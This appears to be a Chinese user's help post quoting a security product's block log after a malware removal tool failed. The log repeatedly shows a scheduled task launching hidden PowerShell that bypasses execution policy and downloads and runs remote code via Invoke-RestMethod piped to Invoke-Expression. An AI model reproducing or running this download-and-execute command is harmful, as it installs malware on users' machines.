专杀也用过了,还是触发系统防护 执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}"
操作结果:已阻止
进程ID:4432
操作进程:C:\Windows\System32\conhost.exe
操作进程命令行:"conhost.exe" --headless C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}"
父进程ID:1416
父进程:C:\Windows\System32\svchost.exe
父进程命令行:C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule
执行命令行:C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}"
操作结果:已阻止
进程ID:4432
操作进程:C:\Windows\System32\conhost.exe
操作进程命令行:"conhost.exe" --headless C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}"
父进程ID:1416
父进程:C:\Windows\System32\svchost.exe
父进程命令行:C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule
